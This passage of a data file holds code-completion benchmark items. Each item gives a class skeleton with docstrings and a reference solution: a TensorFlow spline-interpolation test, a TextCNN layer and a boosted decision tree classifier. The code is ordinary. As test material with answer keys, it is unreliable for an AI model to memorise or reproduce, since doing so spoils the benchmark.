yields the best reconstruction for the function values at the query points. The training data locations are optimized iteratively using gradient descent.", "name": "test_interpolation_gradient", "signature": "def test_interpolation_gradient(self)"}], "n_methods": 4, "prompt": "Implement the Python class `InterpolateSplineTest` described below.\n\nClass description:\nImplement the InterpolateSplineTest class.\n\nMethod signatures and docstrings:\n- def test_1d_linear_interpolation(self): For 1d linear interpolation, we can compare directly to scipy.\n- def test_1d_interpolation(self): Regression test for interpolation with 1-D points.\n- def test_nd_linear_interpolation(self): Regression test for interpolation with N-D points.\n- def test_interpolation_gradient(self): Make sure that backprop can run. Correctness of gradients is assumed. Here, we create a use a small 'training' set and a more densely-sampled set of query points, for which we know the true value in advance. The goal is to choose x locations for the training data such that interpolating using this training data yields the best reconstruction for the function values at the query points. The training data locations are optimized iteratively using gradient descent.", "prompted_full_text": "Implement the Python class `InterpolateSplineTest` described below.\n\nClass description:\nImplement the InterpolateSplineTest class.\n\nMethod signatures and docstrings:\n- def test_1d_linear_interpolation(self): For 1d linear interpolation, we can compare directly to scipy.\n- def test_1d_interpolation(self): Regression test for interpolation with 1-D points.\n- def test_nd_linear_interpolation(self): Regression test for interpolation with N-D points.\n- def test_interpolation_gradient(self): Make sure that backprop can run. Correctness of gradients is assumed. Here, we create a use a small 'training' set and a more densely-sampled set of query points, for which we know the true value in advance. The goal is to choose x locations for the training data such that interpolating using this training data yields the best reconstruction for the function values at the query points. The training data locations are optimized iteratively using gradient descent.\n\n<|skeleton|>\nclass InterpolateSplineTest:\n\n def test_1d_linear_interpolation(self):\n \"\"\"For 1d linear interpolation, we can compare directly to scipy.\"\"\"\n <|body_0|>\n\n def test_1d_interpolation(self):\n \"\"\"Regression test for interpolation with 1-D points.\"\"\"\n <|body_1|>\n\n def test_nd_linear_interpolation(self):\n \"\"\"Regression test for interpolation with N-D points.\"\"\"\n <|body_2|>\n\n def test_interpolation_gradient(self):\n \"\"\"Make sure that backprop can run. Correctness of gradients is assumed. Here, we create a use a small 'training' set and a more densely-sampled set of query points, for which we know the true value in advance. The goal is to choose x locations for the training data such that interpolating using this training data yields the best reconstruction for the function values at the query points. The training data locations are optimized iteratively using gradient descent.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n tp = _QuadraticPlusSinProblem1D()\n query_points, _, train_points, train_values = tp.get_problem(extrapolate=False, dtype='float64')\n interpolation_order = 1\n with ops.name_scope('interpolator'):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order)\n with self.test_session() as sess:\n fetches = [query_points, train_points, train_values, interpolator]\n query_points_, train_points_, train_values_, interp_ = sess.run(fetches)\n interp_ = interp_[0, :, 0]\n query_points_ = query_points_[0, :, 0]\n train_points_ = train_points_[0, :, 0]\n train_values_ = train_values_[0, :, 0]\n scipy_interp_function = sc_interpolate.interp1d(train_points_, train_values_, kind='linear')\n scipy_interpolation = scipy_interp_function(query_points_)\n scipy_interpolation_on_train = scipy_interp_function(train_points_)\n tol = 0.001\n self.assertAllClose(train_values_, scipy_interpolation_on_train, atol=tol, rtol=tol)\n self.assertAllClose(interp_, scipy_interpolation, atol=tol, rtol=tol)\n<|end_body_0|>\n\n<|body_start_1|>\n tp = _QuadraticPlusSinProblem1D()\n query_points, _, train_points, train_values = tp.get_problem(dtype='float64')\n for order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)\n<|end_body_1|>\n\n<|body_start_2|>\n tp = _QuadraticPlusSinProblemND()\n query_points, _, train_points, train_values = tp.get_problem(dtype='float64')\n for order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)\n<|end_body_2|>\n\n<|body_start_3|>\n tp = _QuadraticPlusSinProblemND()\n query_points, query_values, train_points, train_values = tp.get_problem(optimizable=True)\n regularization = 0.001\n for interpolation_order in (1, 2, 3, 4):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order, regularization)\n loss = math_ops.reduce_mean(math_ops.square(query_values - interpolator))\n optimizer = momentum.MomentumOptimizer(0.001, 0.9)\n grad = gradients.gradients(loss, [train_points])\n grad, _ = clip_ops.clip_by_global_norm(grad, 1.0)\n opt_func = optimizer.apply_gradients(zip(grad, [train_points]))\n init_op = variables.global_variables_initializer()\n with self.test_session() as sess:\n sess.run(init_op)\n for _ in range(100):\n sess.run([loss, opt_func])\n<|end_body_3|>\n", "revision_id": "181bc2b37aa8a3eeb11a942d8f330b04abc804b3", "skeleton": "<|skeleton|>\nclass InterpolateSplineTest:\n\n def test_1d_linear_interpolation(self):\n \"\"\"For 1d linear interpolation, we can compare directly to scipy.\"\"\"\n <|body_0|>\n\n def test_1d_interpolation(self):\n \"\"\"Regression test for interpolation with 1-D points.\"\"\"\n <|body_1|>\n\n def test_nd_linear_interpolation(self):\n \"\"\"Regression test for interpolation with N-D points.\"\"\"\n <|body_2|>\n\n def test_interpolation_gradient(self):\n \"\"\"Make sure that backprop can run. Correctness of gradients is assumed. Here, we create a use a small 'training' set and a more densely-sampled set of query points, for which we know the true value in advance. The goal is to choose x locations for the training data such that interpolating using this training data yields the best reconstruction for the function values at the query points. The training data locations are optimized iteratively using gradient descent.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class InterpolateSplineTest:\n def test_1d_linear_interpolation(self):\n \"\"\"For 1d linear interpolation, we can compare directly to scipy.\"\"\"\n tp = _QuadraticPlusSinProblem1D()\n query_points, _, train_points, train_values = tp.get_problem(extrapolate=False, dtype='float64')\n interpolation_order = 1\n with ops.name_scope('interpolator'):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order)\n with self.test_session() as sess:\n fetches = [query_points, train_points, train_values, interpolator]\n query_points_, train_points_, train_values_, interp_ = sess.run(fetches)\n interp_ = interp_[0, :, 0]\n query_points_ = query_points_[0, :, 0]\n train_points_ = train_points_[0, :, 0]\n train_values_ = train_values_[0, :, 0]\n scipy_interp_function = sc_interpolate.interp1d(train_points_, train_values_, kind='linear')\n scipy_interpolation = scipy_interp_function(query_points_)\n scipy_interpolation_on_train = scipy_interp_function(train_points_)\n tol = 0.001\n self.assertAllClose(train_values_, scipy_interpolation_on_train, atol=tol, rtol=tol)\n self.assertAllClose(interp_, scipy_interpolation, atol=tol, rtol=tol)\n\n def test_1d_interpolation(self):\n \"\"\"Regression test for interpolation with 1-D points.\"\"\"\n tp = _QuadraticPlusSinProblem1D()\n query_points, _, train_points, train_values = tp.get_problem(dtype='float64')\n for order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)\n\n def test_nd_linear_interpolation(self):\n \"\"\"Regression test for interpolation with N-D points.\"\"\"\n tp = _QuadraticPlusSinProblemND()\n query_points, _, train_points, train_values = tp.get_problem(dtype='float64')\n for order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)\n\n def test_interpolation_gradient(self):\n \"\"\"Make sure that backprop can run. Correctness of gradients is assumed. Here, we create a use a small 'training' set and a more densely-sampled set of query points, for which we know the true value in advance. The goal is to choose x locations for the training data such that interpolating using this training data yields the best reconstruction for the function values at the query points. The training data locations are optimized iteratively using gradient descent.\"\"\"\n tp = _QuadraticPlusSinProblemND()\n query_points, query_values, train_points, train_values = tp.get_problem(optimizable=True)\n regularization = 0.001\n for interpolation_order in (1, 2, 3, 4):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order, regularization)\n loss = math_ops.reduce_mean(math_ops.square(query_values - interpolator))\n optimizer = momentum.MomentumOptimizer(0.001, 0.9)\n grad = gradients.gradients(loss, [train_points])\n grad, _ = clip_ops.clip_by_global_norm(grad, 1.0)\n opt_func = optimizer.apply_gradients(zip(grad, [train_points]))\n init_op = variables.global_variables_initializer()\n with self.test_session() as sess:\n sess.run(init_op)\n for _ in range(100):\n sess.run([loss, opt_func])\n", "source": "the_stack_v2_python_sparse", "source_path": "tensorflow/contrib/image/python/kernel_tests/interpolate_spline_test.py", "source_repo": "zylo117/tensorflow-gpu-macosx", "split": "test", "star_events_count": 116} {"blob_id": "224ee86b1b335501d77a4ca4092a1c7b893bc2c5", "bodies": ["TFBaseLayer.__init__(self)\nself.in_hidden = in_hidden\nself.emb_size = self.in_hidden.get_shape()[-1]\nself.max_seq_len = max_seq_len\nself.filter_sizes = filter_sizes\nself.num_filters = num_filters\nself.training = training\nself.scope = scope", "embedded_words_expanded = tf.expand_dims(self.in_hidden, -1)\npooled_outputs = []\nfor i, filter_size in enumerate(self.filter_sizes):\n with tf.variable_scope(self.scope + '-' + str(filter_size), reuse=tf.AUTO_REUSE):\n filter_shape = [filter_size, self.emb_size, 1, self.num_filters]\n filters = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name='filters')\n W = tf.get_variable('W' + str(filter_size), shape=filter_shape, initializer=tf.truncated_normal_initializer(stddev=0.1))\n b = tf.get_variable('b' + str(filter_size), shape=[self.num_filters], initializer=tf.zeros_initializer())\n conv = tf.nn.conv2d(embedded_words_expanded, W, strides=[1, 1, 1, 1], padding='VALID', name='conv' + str(filter_size))\n conv = tf.add(conv, b)\n bn_conv = tf.layers.batch_normalization(conv, training=self.training, name='BN')\n hidden = tf.nn.relu(bn_conv, name='relu')\n pooled = tf.nn.max_pool(hidden, ksize=[1, self.max_seq_len - filter_size + 1, 1, 1], strides=[1, 1, 1, 1], padding='VALID', name='pool' + str(filter_size))\n pooled_outputs.append(pooled)\nfeature_dim = self.num_filters * len(self.filter_sizes)\nh_pool = tf.concat(pooled_outputs, 3)\noutput = tf.reshape(h_pool, [-1, feature_dim])\nreturn output"], "bodies_text": "<|body_start_0|>\n TFBaseLayer.__init__(self)\n self.in_hidden = in_hidden\n self.emb_size = self.in_hidden.get_shape()[-1]\n self.max_seq_len = max_seq_len\n self.filter_sizes = filter_sizes\n self.num_filters = num_filters\n self.training = training\n self.scope = scope\n<|end_body_0|>\n\n<|body_start_1|>\n embedded_words_expanded = tf.expand_dims(self.in_hidden, -1)\n pooled_outputs = []\n for i, filter_size in enumerate(self.filter_sizes):\n with tf.variable_scope(self.scope + '-' + str(filter_size), reuse=tf.AUTO_REUSE):\n filter_shape = [filter_size, self.emb_size, 1, self.num_filters]\n filters = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name='filters')\n W = tf.get_variable('W' + str(filter_size), shape=filter_shape, initializer=tf.truncated_normal_initializer(stddev=0.1))\n b = tf.get_variable('b' + str(filter_size), shape=[self.num_filters], initializer=tf.zeros_initializer())\n conv = tf.nn.conv2d(embedded_words_expanded, W, strides=[1, 1, 1, 1], padding='VALID', name='conv' + str(filter_size))\n conv = tf.add(conv, b)\n bn_conv = tf.layers.batch_normalization(conv, training=self.training, name='BN')\n hidden = tf.nn.relu(bn_conv, name='relu')\n pooled = tf.nn.max_pool(hidden, ksize=[1, self.max_seq_len - filter_size + 1, 1, 1], strides=[1, 1, 1, 1], padding='VALID', name='pool' + str(filter_size))\n pooled_outputs.append(pooled)\n feature_dim = self.num_filters * len(self.filter_sizes)\n h_pool = tf.concat(pooled_outputs, 3)\n output = tf.reshape(h_pool, [-1, feature_dim])\n return output\n<|end_body_1|>\n", "class_docstring": "TextCNN Layer 底层embedding layer, 再接多窗口多核卷积,最后最大池化max-pooling", "class_name": "TFTextCNNLayer", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TFTextCNNLayer:\n \"\"\"TextCNN Layer 底层embedding layer, 再接多窗口多核卷积,最后最大池化max-pooling\"\"\"\n\n def __init__(self, in_hidden, max_seq_len, filter_sizes, num_filters, training, scope='text_cnn'):\n \"\"\"TextCNN初始化 Args: in_hidden: 输入层tensor, 通常是一个batch的词向量 max_seq_len: 序列最大长度 filter_sizes: array类型,所有卷积核的大小,支持多个窗口同时卷积 num_filters: 卷积核个数\"\"\"\n <|body_0|>\n\n def build(self):\n \"\"\"TextCNN Layer层 Returns: 返回经过TextCNN后的隐层表示,shape是[batch, feature_dim=filter_sizes*num_filters]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n TFBaseLayer.__init__(self)\n self.in_hidden = in_hidden\n self.emb_size = self.in_hidden.get_shape()[-1]\n self.max_seq_len = max_seq_len\n self.filter_sizes = filter_sizes\n self.num_filters = num_filters\n self.training = training\n self.scope = scope\n<|end_body_0|>\n\n<|body_start_1|>\n embedded_words_expanded = tf.expand_dims(self.in_hidden, -1)\n pooled_outputs = []\n for i, filter_size in enumerate(self.filter_sizes):\n with tf.variable_scope(self.scope + '-' + str(filter_size), reuse=tf.AUTO_REUSE):\n filter_shape = [filter_size, self.emb_size, 1, self.num_filters]\n filters = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name='filters')\n W = tf.get_variable('W' + str(filter_size), shape=filter_shape, initializer=tf.truncated_normal_initializer(stddev=0.1))\n b = tf.get_variable('b' + str(filter_size), shape=[self.num_filters], initializer=tf.zeros_initializer())\n conv = tf.nn.conv2d(embedded_words_expanded, W, strides=[1, 1, 1, 1], padding='VALID', name='conv' + str(filter_size))\n conv = tf.add(conv, b)\n bn_conv = tf.layers.batch_normalization(conv, training=self.training, name='BN')\n hidden = tf.nn.relu(bn_conv, name='relu')\n pooled = tf.nn.max_pool(hidden, ksize=[1, self.max_seq_len - filter_size + 1, 1, 1], strides=[1, 1, 1, 1], padding='VALID', name='pool' + str(filter_size))\n pooled_outputs.append(pooled)\n feature_dim = self.num_filters * len(self.filter_sizes)\n h_pool = tf.concat(pooled_outputs, 3)\n output = tf.reshape(h_pool, [-1, feature_dim])\n return output\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000010", "length_bytes": 4283, "license_type": "permissive", "methods": [{"docstring": "TextCNN初始化 Args: in_hidden: 输入层tensor, 通常是一个batch的词向量 max_seq_len: 序列最大长度 filter_sizes: array类型,所有卷积核的大小,支持多个窗口同时卷积 num_filters: 卷积核个数", "name": "__init__", "signature": "def __init__(self, in_hidden, max_seq_len, filter_sizes, num_filters, training, scope='text_cnn')"}, {"docstring": "TextCNN Layer层 Returns: 返回经过TextCNN后的隐层表示,shape是[batch, feature_dim=filter_sizes*num_filters]", "name": "build", "signature": "def build(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_test_000375", "prompt": "Implement the Python class `TFTextCNNLayer` described below.\n\nClass description:\nTextCNN Layer 底层embedding layer, 再接多窗口多核卷积,最后最大池化max-pooling\n\nMethod signatures and docstrings:\n- def __init__(self, in_hidden, max_seq_len, filter_sizes, num_filters, training, scope='text_cnn'): TextCNN初始化 Args: in_hidden: 输入层tensor, 通常是一个batch的词向量 max_seq_len: 序列最大长度 filter_sizes: array类型,所有卷积核的大小,支持多个窗口同时卷积 num_filters: 卷积核个数\n- def build(self): TextCNN Layer层 Returns: 返回经过TextCNN后的隐层表示,shape是[batch, feature_dim=filter_sizes*num_filters]", "prompted_full_text": "Implement the Python class `TFTextCNNLayer` described below.\n\nClass description:\nTextCNN Layer 底层embedding layer, 再接多窗口多核卷积,最后最大池化max-pooling\n\nMethod signatures and docstrings:\n- def __init__(self, in_hidden, max_seq_len, filter_sizes, num_filters, training, scope='text_cnn'): TextCNN初始化 Args: in_hidden: 输入层tensor, 通常是一个batch的词向量 max_seq_len: 序列最大长度 filter_sizes: array类型,所有卷积核的大小,支持多个窗口同时卷积 num_filters: 卷积核个数\n- def build(self): TextCNN Layer层 Returns: 返回经过TextCNN后的隐层表示,shape是[batch, feature_dim=filter_sizes*num_filters]\n\n<|skeleton|>\nclass TFTextCNNLayer:\n \"\"\"TextCNN Layer 底层embedding layer, 再接多窗口多核卷积,最后最大池化max-pooling\"\"\"\n\n def __init__(self, in_hidden, max_seq_len, filter_sizes, num_filters, training, scope='text_cnn'):\n \"\"\"TextCNN初始化 Args: in_hidden: 输入层tensor, 通常是一个batch的词向量 max_seq_len: 序列最大长度 filter_sizes: array类型,所有卷积核的大小,支持多个窗口同时卷积 num_filters: 卷积核个数\"\"\"\n <|body_0|>\n\n def build(self):\n \"\"\"TextCNN Layer层 Returns: 返回经过TextCNN后的隐层表示,shape是[batch, feature_dim=filter_sizes*num_filters]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n TFBaseLayer.__init__(self)\n self.in_hidden = in_hidden\n self.emb_size = self.in_hidden.get_shape()[-1]\n self.max_seq_len = max_seq_len\n self.filter_sizes = filter_sizes\n self.num_filters = num_filters\n self.training = training\n self.scope = scope\n<|end_body_0|>\n\n<|body_start_1|>\n embedded_words_expanded = tf.expand_dims(self.in_hidden, -1)\n pooled_outputs = []\n for i, filter_size in enumerate(self.filter_sizes):\n with tf.variable_scope(self.scope + '-' + str(filter_size), reuse=tf.AUTO_REUSE):\n filter_shape = [filter_size, self.emb_size, 1, self.num_filters]\n filters = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name='filters')\n W = tf.get_variable('W' + str(filter_size), shape=filter_shape, initializer=tf.truncated_normal_initializer(stddev=0.1))\n b = tf.get_variable('b' + str(filter_size), shape=[self.num_filters], initializer=tf.zeros_initializer())\n conv = tf.nn.conv2d(embedded_words_expanded, W, strides=[1, 1, 1, 1], padding='VALID', name='conv' + str(filter_size))\n conv = tf.add(conv, b)\n bn_conv = tf.layers.batch_normalization(conv, training=self.training, name='BN')\n hidden = tf.nn.relu(bn_conv, name='relu')\n pooled = tf.nn.max_pool(hidden, ksize=[1, self.max_seq_len - filter_size + 1, 1, 1], strides=[1, 1, 1, 1], padding='VALID', name='pool' + str(filter_size))\n pooled_outputs.append(pooled)\n feature_dim = self.num_filters * len(self.filter_sizes)\n h_pool = tf.concat(pooled_outputs, 3)\n output = tf.reshape(h_pool, [-1, feature_dim])\n return output\n<|end_body_1|>\n", "revision_id": "c4423c2625c398f5a93c747f3516f378b31ece46", "skeleton": "<|skeleton|>\nclass TFTextCNNLayer:\n \"\"\"TextCNN Layer 底层embedding layer, 再接多窗口多核卷积,最后最大池化max-pooling\"\"\"\n\n def __init__(self, in_hidden, max_seq_len, filter_sizes, num_filters, training, scope='text_cnn'):\n \"\"\"TextCNN初始化 Args: in_hidden: 输入层tensor, 通常是一个batch的词向量 max_seq_len: 序列最大长度 filter_sizes: array类型,所有卷积核的大小,支持多个窗口同时卷积 num_filters: 卷积核个数\"\"\"\n <|body_0|>\n\n def build(self):\n \"\"\"TextCNN Layer层 Returns: 返回经过TextCNN后的隐层表示,shape是[batch, feature_dim=filter_sizes*num_filters]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TFTextCNNLayer:\n \"\"\"TextCNN Layer 底层embedding layer, 再接多窗口多核卷积,最后最大池化max-pooling\"\"\"\n\n def __init__(self, in_hidden, max_seq_len, filter_sizes, num_filters, training, scope='text_cnn'):\n \"\"\"TextCNN初始化 Args: in_hidden: 输入层tensor, 通常是一个batch的词向量 max_seq_len: 序列最大长度 filter_sizes: array类型,所有卷积核的大小,支持多个窗口同时卷积 num_filters: 卷积核个数\"\"\"\n TFBaseLayer.__init__(self)\n self.in_hidden = in_hidden\n self.emb_size = self.in_hidden.get_shape()[-1]\n self.max_seq_len = max_seq_len\n self.filter_sizes = filter_sizes\n self.num_filters = num_filters\n self.training = training\n self.scope = scope\n\n def build(self):\n \"\"\"TextCNN Layer层 Returns: 返回经过TextCNN后的隐层表示,shape是[batch, feature_dim=filter_sizes*num_filters]\"\"\"\n embedded_words_expanded = tf.expand_dims(self.in_hidden, -1)\n pooled_outputs = []\n for i, filter_size in enumerate(self.filter_sizes):\n with tf.variable_scope(self.scope + '-' + str(filter_size), reuse=tf.AUTO_REUSE):\n filter_shape = [filter_size, self.emb_size, 1, self.num_filters]\n filters = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name='filters')\n W = tf.get_variable('W' + str(filter_size), shape=filter_shape, initializer=tf.truncated_normal_initializer(stddev=0.1))\n b = tf.get_variable('b' + str(filter_size), shape=[self.num_filters], initializer=tf.zeros_initializer())\n conv = tf.nn.conv2d(embedded_words_expanded, W, strides=[1, 1, 1, 1], padding='VALID', name='conv' + str(filter_size))\n conv = tf.add(conv, b)\n bn_conv = tf.layers.batch_normalization(conv, training=self.training, name='BN')\n hidden = tf.nn.relu(bn_conv, name='relu')\n pooled = tf.nn.max_pool(hidden, ksize=[1, self.max_seq_len - filter_size + 1, 1, 1], strides=[1, 1, 1, 1], padding='VALID', name='pool' + str(filter_size))\n pooled_outputs.append(pooled)\n feature_dim = self.num_filters * len(self.filter_sizes)\n h_pool = tf.concat(pooled_outputs, 3)\n output = tf.reshape(h_pool, [-1, feature_dim])\n return output\n", "source": "the_stack_v2_python_sparse", "source_path": "layers/tf_textcnn_layer.py", "source_repo": "snowhws/deeplearning", "split": "test", "star_events_count": 10} {"blob_id": "c3a6ca64f933d03a2deb5162d8b20cdb71dd0bb4", "bodies": ["self.clfs = []\nself.betas = []\nself.numBoostingIters = numBoostingIters\nself.maxTreeDepth = maxTreeDepth\nself.K = None\nself.classes = None", "X = X.to_numpy()\ny = y.to_numpy()\nn, d = X.shape\ny = y.reshape(-1, 1)\nself.classes = np.unique(y)\nself.K = len(self.classes)\nweights = np.full(n, 1 / n).reshape(-1, 1)\nfor iter_num in range(self.numBoostingIters):\n h = tree.DecisionTreeClassifier(max_depth=self.maxTreeDepth, random_state=random_state)\n h.fit(X, y, sample_weight=weights.flatten())\n self.clfs.append(h)\n y_pred = h.predict(X).reshape(-1, 1)\n epsilon = np.sum((y_pred != y) * weights)\n beta = np.log((self.K - 1) * (1 - epsilon) / epsilon) / 2\n self.betas.append(beta)\n weights[y_pred == y] *= np.exp(-beta)\n weights[y_pred != y] *= np.exp(beta)\n weights /= sum(weights)", "X = X.to_numpy()\nn, d = X.shape\nproba = np.zeros((n, self.K))\nfor iter_num in range(self.numBoostingIters):\n proba += self.clfs[iter_num].predict_proba(X)\nmax_proba = np.argmax(proba, axis=1).reshape(-1)\npred_array = np.tile(self.classes, (n, 1))\ny_pred = np.choose(max_proba, pred_array.T).reshape(-1, 1)\nreturn pd.DataFrame(y_pred)"], "bodies_text": "<|body_start_0|>\n self.clfs = []\n self.betas = []\n self.numBoostingIters = numBoostingIters\n self.maxTreeDepth = maxTreeDepth\n self.K = None\n self.classes = None\n<|end_body_0|>\n\n<|body_start_1|>\n X = X.to_numpy()\n y = y.to_numpy()\n n, d = X.shape\n y = y.reshape(-1, 1)\n self.classes = np.unique(y)\n self.K = len(self.classes)\n weights = np.full(n, 1 / n).reshape(-1, 1)\n for iter_num in range(self.numBoostingIters):\n h = tree.DecisionTreeClassifier(max_depth=self.maxTreeDepth, random_state=random_state)\n h.fit(X, y, sample_weight=weights.flatten())\n self.clfs.append(h)\n y_pred = h.predict(X).reshape(-1, 1)\n epsilon = np.sum((y_pred != y) * weights)\n beta = np.log((self.K - 1) * (1 - epsilon) / epsilon) / 2\n self.betas.append(beta)\n weights[y_pred == y] *= np.exp(-beta)\n weights[y_pred != y] *= np.exp(beta)\n weights /= sum(weights)\n<|end_body_1|>\n\n<|body_start_2|>\n X = X.to_numpy()\n n, d = X.shape\n proba = np.zeros((n, self.K))\n for iter_num in range(self.numBoostingIters):\n proba += self.clfs[iter_num].predict_proba(X)\n max_proba = np.argmax(proba, axis=1).reshape(-1)\n pred_array = np.tile(self.classes, (n, 1))\n y_pred = np.choose(max_proba, pred_array.T).reshape(-1, 1)\n return pd.DataFrame(y_pred)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "BoostedDT", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BoostedDT:\n\n def __init__(self, numBoostingIters=100, maxTreeDepth=3):\n \"\"\"Constructor Class Fields clfs : List object containing individual DecisionTree classifiers, in order of creation during boosting betas : List of beta values, in order of creation during boosting\"\"\"\n <|body_0|>\n\n def fit(self, X, y, random_state=None):\n \"\"\"Trains the model. Be sure to initialize all individual Decision trees with the provided random_state value if provided. Arguments: X is an n-by-d Pandas Data Frame y is an n-by-1 Pandas Data Frame random_seed is an optional integer value\"\"\"\n <|body_1|>\n\n def predict(self, X):\n \"\"\"Used the model to predict values for each instance in X Arguments: X is an n-by-d Pandas Data Frame Returns: an n-by-1 Pandas Data Frame of the predictions\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.clfs = []\n self.betas = []\n self.numBoostingIters = numBoostingIters\n self.maxTreeDepth = maxTreeDepth\n self.K = None\n self.classes = None\n<|end_body_0|>\n\n<|body_start_1|>\n X = X.to_numpy()\n y = y.to_numpy()\n n, d = X.shape\n y = y.reshape(-1, 1)\n self.classes = np.unique(y)\n self.K = len(self.classes)\n weights = np.full(n, 1 / n).reshape(-1, 1)\n for iter_num in range(self.numBoostingIters):\n h = tree.DecisionTreeClassifier(max_depth=self.maxTreeDepth, random_state=random_state)\n h.fit(X, y, sample_weight=weights.flatten())\n self.clfs.append(h)\n y_pred = h.predict(X).reshape(-1, 1)\n epsilon = np.sum((y_pred != y) * weights)\n beta = np.log((self.K - 1) * (1 - epsilon) / epsilon) / 2\n self.betas.append(beta)\n weights[y_pred == y] *= np.exp(-beta)\n weights[y_pred != y] *= np.exp(beta)\n weights /= sum(weights)\n<|end_body_1|>\n\n<|body_start_2|>\n X = X.to_numpy()\n n, d = X.shape\n proba = np.zeros((n, self.K))\n for iter_num in range(self.numBoostingIters):\n proba += self.clfs[iter_num].predict_proba(X)\n max_proba = np.argmax(proba, axis=1).reshape(-1)\n pred_array = np.tile(self.classes, (n, 1))\n y_pred = np.choose(max_proba, pred_array.T).reshape(-1, 1)\n return pd.DataFrame(y_pred)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000011", "length_bytes": 2622, "license_type": "no_license", "methods": [{"docstring": "Constructor Class Fields clfs : List object containing individual DecisionTree classifiers, in order of creation during boosting betas : List of beta values, in order of creation during boosting", "name": "__init__", "signature": "def __init__(self, numBoostingIters=100, maxTreeDepth=3)"}, {"docstring": "Trains the model. Be sure to initialize all individual Decision trees with the provided random_state value if provided. Arguments: X is an n-by-d Pandas Data Frame y is an n-by-1 Pandas Data Frame random_seed is an optional integer value", "name": "fit", "signature": "def fit(self, X, y, random_state=None)"}, {"docstring": "Used the model to predict values for each instance in X Arguments: X is an n-by-d Pandas Data Frame Returns: an n-by-1 Pandas Data Frame of the predictions", "name": "predict", "signature": "def predict(self, X)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000496", "prompt": "Implement the Python class `BoostedDT` described below.\n\nClass description:\nImplement the BoostedDT class.\n\nMethod signatures and docstrings:\n- def __init__(self, numBoostingIters=100, maxTreeDepth=3): Constructor Class Fields clfs : List object containing individual DecisionTree classifiers, in order of creation during boosting betas : List of beta values, in order of creation during boosting\n- def fit(self, X, y, random_state=None): Trains the model. Be sure to initialize all individual Decision trees with the provided random_state value if provided. Arguments: X is an n-by-d Pandas Data Frame y is an n-by-1 Pandas Data Frame random_seed is an optional integer value\n- def predict(self, X): Used the model to predict values for each instance in X Arguments: X is an n-by-d Pandas Data Frame Returns: an n-by-1 Pandas Data Frame of the predictions", "prompted_full_text": "Implement the Python class `BoostedDT` described below.\n\nClass description:\nImplement the BoostedDT class.\n\nMethod signatures and docstrings:\n- def __init__(self, numBoostingIters=100, maxTreeDepth=3): Constructor Class Fields clfs : List object containing individual DecisionTree classifiers, in order of creation during boosting betas : List of beta values, in order of creation during boosting\n- def fit(self, X, y, random_state=None): Trains the model. Be sure to initialize all individual Decision trees with the provided random_state value if provided. Arguments: X is an n-by-d Pandas Data Frame y is an n-by-1 Pandas Data Frame random_seed is an optional integer value\n- def predict(self, X): Used the model to predict values for each instance in X Arguments: X is an n-by-d Pandas Data Frame Returns: an n-by-1 Pandas Data Frame of the predictions\n\n<|skeleton|>\nclass BoostedDT:\n\n def __init__(self, numBoostingIters=100, maxTreeDepth=3):\n \"\"\"Constructor Class Fields clfs : List object containing individual DecisionTree classifiers, in order of creation during boosting betas : List of beta values, in order of creation during boosting\"\"\"\n <|body_0|>\n\n def fit(self, X, y, random_state=None):\n \"\"\"Trains the model. Be sure to initialize all individual Decision trees with the provided random_state value if provided. Arguments: X is an n-by-d Pandas Data Frame y is an n-by-1 Pandas Data Frame random_seed is an optional integer value\"\"\"\n <|body_1|>\n\n def predict(self, X):\n 